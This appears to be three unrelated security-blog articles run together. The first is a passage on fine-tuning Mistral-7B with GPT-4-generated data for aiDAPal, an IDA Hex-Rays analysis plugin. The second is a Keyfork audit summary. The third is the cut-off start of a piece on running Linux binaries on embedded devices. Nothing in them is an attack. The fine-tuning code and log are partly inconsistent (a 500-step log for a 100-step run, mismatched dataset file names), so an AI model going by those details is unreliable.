    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False, "format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        # the generated text lives under 'response' and should itself be JSON
        return json.loads(res.json()['response'])
    except (KeyError, ValueError):
        print('error unpacking response')
        print(res.json().get('response'))


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA plugin that would work OK - but we can do better.

Fine-Tuning - step one: draw two circles

The initial training that produces a released set of model weights is computationally expensive, while follow-on fine-tuning is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that represent "ideal" behavior when interacting with a user. The process is iterative and can be repeated until the model matches the expected behavior.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance and compete on specific tasks or knowledge domains. To carry out a fine-tune of a model, you need to complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

For this task, the knowledge domain is already known - we want to fine-tune a model that can aid with analysis of Hex-Rays pseudocode. The next step, constructing a dataset, is the difficult part. At a high level, the dataset will be made up of "instruction-following" examples, like the following:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples show two types of instruction-following dataset entries. The first specifies the instruction to be followed, a matching input (user input), and finally the ideal output (generated result). The second provides only an instruction along with an example output - this form is useful for generative-only responses that do not require user input; it is not that useful for our current task but is included as an example. A dataset entry useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact JSON formatting will allow us to use the datasets library from Hugging Face, and it is a common format.
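As a quick sanity check of the format (assuming the entries are collected into a dataset.json file, the same name used during training later), the dataset can be loaded directly:

```python
from datasets import load_dataset

dataset = load_dataset("json", data_files="dataset.json", split="train")
print(dataset.column_names)      # ['instruction', 'input', 'output']
print(dataset[0]["instruction"])
```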

With the exact format needed for training identified, the next problem is that we need thousands of these examples, ideally with high-quality responses. I had considered manually creating the required dataset using tree-sitter - rewriting valid code with generic variable names while sourcing the function descriptions from documentation - but this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html), I decided to try the same style of approach: use an LLM to build your dataset based on a smaller (or, in this case, incomplete) dataset and train against that.

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export each function's Hex-Rays output into individual files by address
  • strip the compiled libraries and repeat the previous step, exporting each function's Hex-Rays output into a new set of files

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high-level this process looks like the following:

  • using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
  • iterate over all the files until complete

After completing this step, we have a large instruction-following dataset we can use to fine-tune against.
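The generation stage itself does not need to be anything fancy. The following is a rough sketch of that loop (assuming the do_analysis() helper from the earlier Ollama client and the directory layout shown above; the INSTRUCTION text is the one from the dataset example):

```python
import os, json

INSTRUCTION = "Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code."

records = []
for name in os.listdir("symbol"):
    with open(os.path.join("symbol", name)) as f:
        symbol_code = f.read()
    with open(os.path.join("stripp", name)) as f:
        stripped_code = f.read()
    # query the model with the symbol/debug version to get a reasonable answer
    analysis = do_analysis(symbol_code)
    if analysis is None:
        continue  # skip failures; they can be re-run later
    # pair the generated analysis with the STRIPPED code for training
    records.append({
        "instruction": INSTRUCTION,
        "input": stripped_code,
        "output": json.dumps(analysis),
    })

with open("dataset.json", "w") as f:
    json.dump(records, f)
```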

Heavy Customization

There are quite a few options when it comes to carrying out a fine-tune of an LLM; at the time of this research project, I chose to use unsloth. Other popular projects exist that are most likely more batteries-included.

I went with unsloth for a few reasons, the main one being that the underlying code has been tuned to provide a large performance increase (speed/memory usage); it also seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!) - I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes, while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions; at the time of this project, installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adapted from the examples provided by unsloth; it uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory / max_memory * 100, 3)
lora_percentage = round(used_memory_for_lora / max_memory * 100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following items:

output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50

This configuration saves a copy of the fine-tuned weights every 50 steps to the outputs directory - this is helpful for a few reasons. First, if an error occurs at some point (crash/power/etc.), you have checkpoints to restart your training from; second, it allows you to evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first that more steps are better, the right number depends on how large your dataset is and which settings you have configured - more is not always better.
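As a side benefit, the underlying transformers Trainer (which SFTTrainer builds on) can pick training back up from these checkpoints. A minimal sketch, assuming the trainer object from the script above:

```python
# resume from the most recent checkpoint in output_dir
trainer_stats = trainer.train(resume_from_checkpoint=True)

# or restart from a specific snapshot
trainer_stats = trainer.train(resume_from_checkpoint="outputs/checkpoint-50")
```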

Running this script to fine-tune mistral-7b-instruct for 100 steps using the dataset we created produces output like the following:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. To do this, I take the first 10 entries from the training dataset and use the instruction and input values to generate new outputs, as well as generating an output for an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# generate outputs for the first sample_size items from the dataset
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well, and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches it perfectly - the somewhat surprising result is that the function comment is better at 50 steps than at 100 steps.

Zooming out a bit and comparing further steps, the format is perfect, while the most common errors seen are confusion about what gets returned (value vs. allocated memory) and inconsistent numeric format (1000 vs. 0x1000).

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results; in fact, it performs worse than our 50-step results, falling into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old, what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4, using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we have tried our best with our small model, we can move on and just use GPT4 - just not in the way you would expect. Going back to the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, whereas so far we have used our small 7b-parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replacing our 'low-quality' generated data with 'high-quality' values from the current leading model.

Using the OpenAI playground, it is fairly simple to set up an 'assistant' with our instructions.

With the configuration working as expected, it is straightforward to use the API and execute the same instruction generation we had previously done.
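For reference, the generation call itself is only a few lines. This is a sketch (assuming the openai Python package v1+, an OPENAI_API_KEY in the environment, and the same instruction text we used for the local model):

```python
from openai import OpenAI

client = OpenAI()

def gpt4_analysis(code: str) -> str:
    resp = client.chat.completions.create(
        model="gpt-4",
        messages=[
            {"role": "system", "content": INSTRUCTION},  # instruction text from earlier
            {"role": "user", "content": code},
        ],
    )
    return resp.choices[0].message.content
```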

I originally had no expectations related to the cost of this process; to be safe, I added $50 to my account before executing the previous step. I was surprised when it only cost ~$16 at the time.

Seeing that the initial run only cost $16 and the quality of the responses was good, I figured: why not use both sets of data and get twice the high-quality instruction data?

With the brand-new high-quality dataset complete, we can circle back and start a new fine-tune of our mistral-7b model; in this case, it was trained for 200 steps, taking snapshots every 50 steps. After training completed, an evaluation was performed against a new input that appears in neither dataset, comparing our old 'low-quality' fine-tune with our new one.

At 50 steps, the new GPT4-trained version has already performed much better at capturing variables to rename; interestingly, the LLM-trained dataset's description contains more direct references to the code, while the GPT4 description is slightly higher level.

At 100 steps, the variable names for the GPT4-trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM-trained model has picked up the extra variable renames, but they look to be in line with what the GPT4-trained model had at 50 steps. I also thought it was interesting that the LLM-trained model refers to [2] as the third field (mathematically correct).

At 150 steps, the GPT4-trained model has slightly improved the function description while maintaining the variable renames. The LLM-trained model has improved the function name to match the GPT4-trained model at 50 steps, while losing variable renames - interestingly, it now refers to [2] as the second element.

Finally, at 200 steps, the GPT4-trained model has slightly tweaked its description. The LLM-trained model has rediscovered its variable renames from the 100-step version and also refined how it references the [2] within the code.

Clearly, the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly...

That response looks like something we have seen already; at this point, I would say we have proven it is feasible to fine-tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality.

I decided to write my own simple version - apologies in advance for any errors or poor design decisions; the underlying fine-tuned model is available to use with whatever you like best. Building off the simple Python script shown earlier, I again chose to use Ollama's REST service instead of loading the model directly - I like this design for a few reasons:

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reload/maintenance/update will not interrupt your weeks long IDA session
  • avoids tying up that IDA instance you have had running for weeks with a large memory footprint :)

To set up Ollama to use the new model, download the weights and Modelfile in the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window.

In this example, the plugin has been configured with a single model; if you have other models loaded within your Ollama service, they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and present a dialog when it is complete.
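For anyone curious how the context-menu hookup works, the following is a minimal IDAPython sketch (not the plugin's actual code; the action name and the reuse of the do_analysis() helper from earlier are mine) of attaching an action to the Hex-Rays pseudocode popup:

```python
import ida_kernwin
import ida_hexrays

class AnalyzeHandler(ida_kernwin.action_handler_t):
    def activate(self, ctx):
        vu = ida_hexrays.get_widget_vdui(ctx.widget)
        if vu:
            code = str(vu.cfunc)      # current function's pseudocode
            print(do_analysis(code))  # hand off to the query helper from earlier
        return 1

    def update(self, ctx):
        if ctx.widget_type == ida_kernwin.BWN_PSEUDOCODE:
            return ida_kernwin.AST_ENABLE_FOR_WIDGET
        return ida_kernwin.AST_DISABLE_FOR_WIDGET

ida_kernwin.register_action(ida_kernwin.action_desc_t(
    "aidapal:analyze", "aiDAPal: analyze function", AnalyzeHandler()))

class PopupHook(ida_kernwin.UI_Hooks):
    def finish_populating_widget_popup(self, widget, popup):
        if ida_kernwin.get_widget_type(widget) == ida_kernwin.BWN_PSEUDOCODE:
            ida_kernwin.attach_action_to_popup(widget, popup, "aidapal:analyze", None)

hooks = PopupHook()
hooks.hook()
```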

Within this dialog all returned values can be accepted individually by selecting the checkbox (enabled by default) and clicking Accept, clicking Cancel will reject all and close the dialog.

In this example, the results are accepted and applied fully.

This example shows rejecting the function name and description, only applying the variable renames.

There is also nothing stopping you from accepting all changes multiple times.

Another consideration I had when creating aiDAPal was implementing some form of data lookup, like Retrieval Augmented Generation (RAG). In the spirit of keeping things simple, I instead came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea: whenever the plugin is activated, it identifies any references within the code being analyzed, retrieves any comments that exist at the target locations, and includes them as a multi-line comment before the function that is sent for analysis. A rough sketch of this workflow is shown below.
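This is my own illustration of the idea using IDAPython, not the plugin's exact implementation; the helper names are hypothetical:

```python
import idautils
import idc

def collect_reference_comments(func_ea):
    # walk every instruction in the function and gather comments that exist
    # at any location the code references
    comments = []
    for insn_ea in idautils.FuncItems(func_ea):
        for xref in idautils.XrefsFrom(insn_ea):
            cmt = idc.get_cmt(xref.to, 0) or idc.get_cmt(xref.to, 1)
            if cmt:
                comments.append(f"{idc.get_name(xref.to)}: {cmt}")
    return comments

def build_query(func_ea, pseudocode):
    comments = collect_reference_comments(func_ea)
    if not comments:
        return pseudocode
    # prepend the gathered knowledge as a multi-line comment
    context = "\n".join(f" * {c}" for c in sorted(set(comments)))
    return f"/*\n{context}\n*/\n{pseudocode}"
```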

For this example, the WDT_ICR register location is queried for any comments; if one exists, it gets extracted and included in our request. Something to consider: in this case, the WDT_ICR register is common and part of the 'base knowledge' stored within the original trained weights, so it would have been identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information to better guide the response. For example, when the comment associated with the WDT_ICR register is changed, the model returns a different result that takes into account the additional knowledge provided by the IDB.

Currently, this functionality does not extract information from comments that may be defined at the start of a function. While that would be useful and would give context as to what a called function does, it would often result in the inclusion of a large number of extra tokens, potentially exhausting the underlying model's context window and returning low-quality results.
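If function-level comments were ever pulled in, a simple token budget check would be needed first. A sketch, assuming the transformers tokenizer for the underlying model and the num_ctx of 4096 set in the Modelfile:

```python
from transformers import AutoTokenizer

tok = AutoTokenizer.from_pretrained("mistralai/Mistral-7B-Instruct-v0.1")

def fits_context(prompt: str, limit: int = 4096, reserve: int = 1024) -> bool:
    # leave room for the generated response within the context window
    return len(tok(prompt).input_ids) <= limit - reserve
```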

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune an LLM for local usage, whether that is making a better version of the one we are sharing or something completely different. It is also worth noting that most of this project was executed earlier this year (Feb/March); since then, a handful of new models have been released that would be interesting to explore and adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Public Report – Keyfork Implementation Review

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low-impact findings were uncovered, each of which was promptly addressed by Distrust.

Cross-Execute Your Linux Binaries, Don’t Cross-Compile Them

Lolbins? Where we’re going, we don’t need lolbins.

At NCC Group, as a consultant in our hardware and embedded systems practice, I often get to play with various devices, which is always fun, but getting your own software to run on them can be a bit of a pain.
This article documents a few realisations and tricks that make my life easier. There is nothing new about anything mentioned here, but there is also hardly anything written about these (ab)use cases.

The challenges we are looking to solve are:

  • Running standard Linux tools on your embedded device
  • Compiling your own tools to run on the embedded device
  • Running binaries from the embedded device on your PC

This can often be achieved by cross-compiling and/or statically compiling the target binary. It is very much a valid approach, but it can also be time-consuming, even when you’re seasoned at this sort of thing. So, the approach described here does not do that.

Taking the dependency libraries with you

The realisation is that while dynamically linked binaries need some of the environment, it is actually not that hard to figure out what that environment is and to copy it over to the system where you want to run the binary.

Consider the example of running strace from an arm64 Raspberry Pi on an arm64 Android phone.

Just copying won’t work, since Android differs too much from common Linux distributions:

pi@rpi:~ $ adb push `which strace` /data/local/tmp
/usr/bin/strace: 1 file pushed, 0 skipped. 16.0 MB/s (1640712 bytes in 0.098s)
pi@rpi:~ $ adb exec-out /data/local/tmp/strace -ttewrite /bin/echo X
/system/bin/sh: /data/local/tmp/strace: No such file or directory
pi@rpi:~ $ adb exec-out ldd /data/local/tmp/strace 
    linux-vdso.so.1 => [vdso] (0x73edb38000)
CANNOT LINK EXECUTABLE "linker64": library "libc.so.6" not found: needed by main executable

We can list the dependencies. strace depends on the dynamic linker, libraries and often on some special bits like VDSO.

pi@rpi:~ $ ldd `which strace`
    linux-vdso.so.1 (0x0000007faf464000)
    libc.so.6 => /lib/aarch64-linux-gnu/libc.so.6 (0x0000007faf0b0000)
